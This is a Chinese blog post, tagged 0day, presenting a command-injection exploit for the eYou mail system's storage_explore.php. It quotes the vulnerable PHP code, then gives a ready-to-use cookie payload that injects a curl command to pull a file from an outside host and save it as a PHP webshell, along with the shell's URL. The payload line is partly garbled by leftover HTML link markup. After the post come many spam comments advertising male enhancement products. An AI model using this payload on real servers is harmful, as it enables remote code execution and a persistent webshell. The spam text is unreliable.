『河马』eyou Storage_explore.php Cookie命令注入漏洞利用工具


文件/user/storage_explort.php
<?php
/**
* 用户网络存储列表
*
* 该页面显示登录邮箱用户的网络存储文件列表,选择后添加到邮件的附件中。
*
* @author FengHui <fenghui@eyou.net>
* @copyright 2008 eYou.net
* @version storage_explore.php 2008/05/19
*/
require_once('/var/eyou/apache/htdocs/config.php');
require_once(PATH.'inc/function.php');
require_once(PATH.'inc/libeyou.php');
require_once(PATH.'inc/operate.php');

$skin               = getCookieUserValue('SKIN');
$uid                = getCookieUserValue('UID');
$domain             = getCookieUserValue('DOMAIN');
$user_dir_path      = getUserDirPath($uid, $domain);
$storage_index_path = $user_dir_path.'/storage/Index/';
$storage_data_path  = $user_dir_path.'/storage/Data/';
$userinfo = get_userinfo($uid , $domain);

// 获取用户允许上传的最大附件大小
$attachsize = (int)($userinfo['attachsize'][0]);

$is_submit = $_POST['is_submit'] ? true : false;
?>
跟进getCookieUserValue函数:

function getCookieUserValue($key) {
    $user_arr = explode('&', cookie('USER'));
    $n = count($user_arr);
    for ($i = 0; $i < $n; $i++) {
        $g_arr = explode('=', $user_arr[$i]);
        if ($g_arr[0] == $key) {
            return $g_arr[1];
        }
    }
    return null;
}

跟进cookie函数:
function cookie($name){
    if (array_key_exists($name, $_COOKIE)) return $_COOKIE[$name];
       return '';

整个过程没有对cookie 进行过滤

直接就取那个cookie中USER的值取出来,然后进入了getUserDirPath函数

来看看getUserDirPath函数:

/**
* 获取用户目录的路径
*
* @param string $uid
* @param string $domain
*/
function getUserDirPath($uid, $domain) {
    $cmd = "/var/eyou/sbin/hashid $uid $domain";
    echo $cmd;
    $path = `$cmd`;
    $path = trim($path);
    return $path;
}

uid和domain直接进入了命令,导致命令执行。



漏洞利用:

将cookie设置为:

USER=UID=1|curl isafe.cc" target="_blank">isafe.cc:8080/test.txt" target="_blank">http://www.isafe.cc" target="_blank">isafe.cc:8080/test.txt>>www.isafe.cc" target="_blank">isafe.cc.php
然后访问localhost/user/storage_explore.php
此时会在localhost/user/下生成www.isafe.cc" target="_blank">isafe.cc.php文件

shell地址为:

localhost/user/www.isafe.cc" target="_blank">isafe.cc.php
只允许会员下载 该文件只允许会员下载! 登录 | 注册

[本日志由 admin 于 2017-10-14 07:51 PM 编辑]
文章来自: 本站原创
引用通告: 查看所有引用 | 我要引用此文章
Tags: 0day
评论: 167 | 引用: 0 | 查看次数: 14286
Boyd [2015-03-28 08:36 AM]
I love looking at your internet site. Appreciate it!



my web page :: male enhancement patches
Eric [2015-03-28 07:19 AM]
Great web-site you have up in the place.

Here is my webpage: free natural Male enhancement techniques
Matilda [2015-03-28 03:00 AM]
Basically, just needed to state I'm delighted I happened on this site!


My webpage: best male enhancement performers
Rene [2015-03-28 00:03 AM]
Particularly interesting look forwards to coming back.

Take a look at my web blog ... male enhancement exercises
Son [2015-03-27 02:48 PM]
You've good knowledge on this website.

Have a look at my homepage - natural male enhancement pills
Theron [2015-03-27 02:00 PM]
I love looking through your site. Thanks a lot!

Also visit my weblog; Fast & Furious 7 en entier VF en Français
Stephanie [2015-03-27 01:14 PM]
Thanks a lot, exceptionally good. Will certainly share this website with my good friends.


Feel free to surf to my website :: www.phantos.com.cn
Adelaide [2015-03-27 12:43 AM]
I treasure the details on your site. Thanks a lot.



Check out my weblog :: natural male enhancement techniques
Kris [2015-03-27 12:23 AM]
Really just needed to emphasize how I am happy that I came upon your page!


my web page Free Natural Male Enhancement Exercises
Rosalyn [2015-03-27 12:16 AM]
Thanks a lot! This is definitely an superb website.


Feel free to surf to my web blog - free natural male enhancement exercise
发表评论
昵 称:
密 码: 游客发言不需要密码.
验证码: 验证码
内 容:
选 项:
虽然发表评论不用注册,但是为了保护您的发言权,建议您注册帐号.
字数限制 1000 字 | UBB代码 开启 | [img]标签 关闭